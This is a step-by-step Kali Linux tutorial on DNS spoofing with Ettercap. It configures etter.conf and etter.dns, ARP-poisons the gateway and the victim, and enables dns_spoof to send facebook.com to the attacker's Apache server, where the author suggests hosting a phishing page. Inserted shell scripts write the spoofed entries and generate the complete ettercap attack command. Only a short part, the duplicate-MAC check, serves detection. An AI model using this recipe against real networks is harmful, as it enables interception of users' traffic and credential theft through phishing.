Today we are going to learn DNS spoofing on Kali Linux with the help of Ettercap, and how to use Ettercap in Kali Linux. Before learning DNS spoofing we need a clear idea of DNS. DNS stands for Domain Name System. A DNS server translates a human-readable domain name (such as google.com or nytimes.com) into the numerical IP address that is used to route communications between nodes.

Screenshot from 2019-07-23 09-12-53.png

As we know, every system has a unique IP address, but it is very difficult for a human to remember the IP addresses of many websites, so a domain name is attached to the IP address. To reduce the effort and improve performance, a DNS resolver saves each translation for a limited time (the record's TTL); this stored copy is called the cache.

This means that if it receives another request for the same translation, it can reply without asking any other server until the cache entry expires.

DNS spoofing is a useful technique in penetration testing. With it an attacker can divert a domain name to an incorrect IP, so that traffic for that name is diverted to the attacker's computer or any other system.

In the setup used here the attacker first poisons the victim's ARP cache (so the attacker sits between the victim and the gateway) and then answers the victim's DNS queries with forged replies. The victim gets no visible warning, which makes the attack hard to notice unless someone checks the ARP table or compares DNS answers against a trusted resolver.

Here, for this tutorial, we use Ettercap to spoof DNS. Ettercap is a very popular and easy-to-use tool for this.

How to install ettercap on kali linux?

We don't need to install Ettercap: it comes pre-installed with Kali Linux. Before opening it we do some configuration. Open a terminal window and edit the etter.conf file in any text editor. The file is located at /etc/ettercap/etter.conf. We use leafpad, and the command will be:
leafpad /etc/ettercap/etter.conf

The screenshot is following:

Screenshot from 2019-07-23 09-14-44.png

Now we scroll down to the Linux section. The screenshot is following:

Screenshot from 2019-07-23 09-22-15.png

Here we use iptables, so we activate the two commands in the iptables part of that section (redir_command_on and redir_command_off). We just need to remove the # in front of them to activate the commands. See the screenshot given below:

Screenshot from 2019-07-23 09-23-32.png

Then we save and close it. Then we start our Apache web server with the following command:
service apache2 start

Then we find our local IP using the following command:

The screenshot is following:

Screenshot from 2019-07-15 07-52-28.png

When we open localhost in a browser, we see the homepage of the Apache web server. We can put anything on our localhost, such as a phishing page or any other malicious web page. Now we point the facebook.com domain at our localhost: if someone on our local network tries to open facebook.com, they will get our localhost page instead of Facebook.

Now we need to configure another Ettercap file, etter.dns, with the following command:
leafpad /etc/ettercap/etter.dns

The screenshot is following:

Screenshot from 2019-07-23 09-25-12.png

Then we scroll down and set our target. See the following screenshot:

Screenshot from 2019-07-22 06-54-03.png

We remove the example domain highlighted in the screenshot and put in the domain we want to redirect, in our case facebook.com; we also change the next line, which covers its sub-domains (*.facebook.com).

Then we change the IPs on those lines to our local IP, and delete the third line (the PTR record). The configuration is shown in the following screenshot:

Screenshot from 2019-07-23 09-29-01.png

Then we save the file and close it.
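The same two edits, done from the shell instead of leafpad, with a check that the iptables lines really became active. This is an added example and not code from the original tutorial; it assumes the ettercap 0.8.x file layout under /etc/ettercap, the two commented redir_command_on / redir_command_off lines in the Linux section of etter.conf, and 192.168.1.5 as an example attacker IP (none of these values come from the page).

```shell
#!/bin/sh
# Added example, not from the original tutorial: the etter.conf and etter.dns
# edits as shell functions. Assumptions (not from the page): ettercap 0.8.x
# paths under /etc/ettercap, the Linux section's commented redir_command_on
# and redir_command_off lines, and 192.168.1.5 as the attacker's IP.

# Print the two etter.dns lines that send a domain and all of its sub-domains
# to our IP. Same layout as the shipped microsoft.com example, without the
# PTR line the tutorial deletes.
etter_dns_entries() {
    domain="$1"
    ip="$2"
    printf '%s\t\tA\t%s\n' "$domain" "$ip"
    printf '*.%s\tA\t%s\n' "$domain" "$ip"
}

# Uncomment the two iptables redir_command lines in the etter.conf named in $1.
# The result goes to stdout so the caller decides where to write it (copy it
# back over the real file only after reading through it).
enable_iptables_redirect() {
    sed 's/^\( *\)#\(redir_command_on *=\)/\1\2/; s/^\( *\)#\(redir_command_off *=\)/\1\2/' "$1"
}

# Count the redir_command lines that are active (not commented out) in file $1.
# Expect 0 before the edit and 2 after it.
active_redir_lines() {
    grep -c '^ *redir_command_o[nf]* *=' "$1" || true
}

# Our own IPv4 address on the interface that reaches the internet, taken from
# the kernel's routing decision for an outside address (the value the tutorial
# reads off by hand).
local_ip() {
    ip -4 route get 1.1.1.1 | awk '{ for (i = 1; i <= NF; i++) if ($i == "src") print $(i + 1) }'
}

# Typical use on the Kali box, as root. Not run automatically here.
#   etter_dns_entries facebook.com "$(local_ip)" >> /etc/ettercap/etter.dns
#   enable_iptables_redirect /etc/ettercap/etter.conf > /tmp/etter.conf
#   active_redir_lines /tmp/etter.conf      # prints 2
#   cp /tmp/etter.conf /etc/ettercap/etter.conf
#   service apache2 start
```

Appending to etter.dns rather than editing the example entry keeps the shipped file intact, which makes it easy to remove the entry again when the test is over.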

Now we open Ettercap with the following command:
ettercap -G

This will open Ettercap's Graphical User Interface (GUI) mode. The screenshot is following:

Screenshot from 2019-07-23 09-30-24.png

Then we click on Sniff and then Unified Sniffing. The screenshot is following:

Here we need to choose our network interface. Then it will start unified sniffing.

Now we choose our target. Before choosing the target we need to stop unified sniffing: click on the "Start" menu and then on "Stop Sniffing".

Then we go to the Targets menu and click on Current Targets. We can see in the following screenshot that we don't have any target yet:

Screenshot from 2019-07-23 09-32-01.png

We need to scan for hosts, so we click on the Hosts menu and then on Scan for hosts.

Then we can see the Host List from the Hosts menu. Here we see some hosts. We need to add our default gateway as Target 1 and the victim as Target 2. In our case we are the victim, so we added our own IP as the target.

Then we go to the Mitm (Man In The Middle) menu, click on ARP poisoning, tick "Sniff remote connections" and click OK. Now the ARP poisoning is set.

Next we go to the Plugins menu, then Manage the plugins, and activate the dns_spoof plugin by double-clicking on it.

The screenshot is following:

Screenshot from 2019-07-23 09-33-19.png

Now we are all set. We go to the Start menu and click on Start Sniffing.

Now we open our browser and try to open facebook.com, but we are redirected to our localhost. We can put any web page on our localhost; if it were a phishing page this would be very dangerous.
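The GUI steps above, run from Ettercap's text interface instead, plus two checks: one to confirm from the victim that the name now resolves to the attacker, and one showing the tell-tale the victim can look for. This is an added example and not code from the original tutorial; it assumes the ettercap 0.8.x target syntax (MAC/IP/IPv6/PORT, written as /IP//), interface eth0, gateway 192.168.1.1, victim 192.168.1.10 and attacker 192.168.1.5, and the neighbour-table lines are constructed sample data, not a capture.

```shell
#!/bin/sh
# Added example, not from the original tutorial. Assumed values (not from the
# page): ettercap 0.8.x "/IP//" target syntax, interface eth0, gateway
# 192.168.1.1, victim 192.168.1.10, attacker 192.168.1.5.

# The ettercap command line equivalent to the GUI clicks:
#   Sniff > Unified sniffing on an interface      -> -i eth0
#   Targets: gateway = Target 1, victim = Target 2 -> /gateway// /victim//
#   Mitm > ARP poisoning, "Sniff remote connections" -> -M arp:remote
#   Plugins > dns_spoof                            -> -P dns_spoof
# -T selects text mode and -q keeps it quiet (no packet dump on the terminal).
ettercap_cmdline() {
    iface="$1"; gateway="$2"; victim="$3"
    printf 'ettercap -T -q -i %s -M arp:remote -P dns_spoof /%s// /%s//\n' \
        "$iface" "$gateway" "$victim"
}

# Run on the victim: does the domain now resolve to the attacker's IP? getent
# goes through the system resolver the same way a browser does. Exit 0 when
# spoofed, 1 otherwise. Not run in the self-test because it needs the network.
is_spoofed() {
    domain="$1"; attacker_ip="$2"
    getent hosts "$domain" | awk '{ print $1 }' | grep -qx "$attacker_ip"
}

# The victim-side sign of the ARP poisoning this attack rides on: two IPs
# (gateway and attacker) claiming the same MAC in the neighbour table. Reads
# lines in the format of "ip neigh" on stdin and prints every MAC that is
# claimed by more than one IP, followed by those IPs.
duplicate_macs() {
    awk '$4 == "lladdr" { seen[$5] = seen[$5] " " $1; n[$5]++ }
         END { for (m in n) if (n[m] > 1) print m ":" seen[m] }'
}

# Constructed sample neighbour table (not a real capture): the gateway and the
# attacker both answer for aa:bb:cc:dd:ee:05 while the attack is running.
SAMPLE_NEIGH='192.168.1.1 dev eth0 lladdr aa:bb:cc:dd:ee:05 REACHABLE
192.168.1.5 dev eth0 lladdr aa:bb:cc:dd:ee:05 REACHABLE
192.168.1.20 dev eth0 lladdr aa:bb:cc:dd:ee:20 STALE'

poisoned_macs() {
    printf '%s\n' "$SAMPLE_NEIGH" | duplicate_macs
}

# On a live victim the same check is:  ip neigh | duplicate_macs
# Typical attacker run, as root:       $(ettercap_cmdline eth0 192.168.1.1 192.168.1.10)
# Then, on the victim:                 is_spoofed facebook.com 192.168.1.5 && echo spoofed
```

Two caveats worth knowing before expecting the Apache page to appear: dns_spoof only answers queries it sees on the wire, so a name the victim's resolver or browser already has cached keeps resolving correctly until that entry expires; and for a site on the browser's HSTS preload list (facebook.com is one) the browser insists on HTTPS and shows a certificate error rather than the plain Apache page, unless the attacker also handles TLS, which is where the redir_command iptables lines from etter.conf come into play.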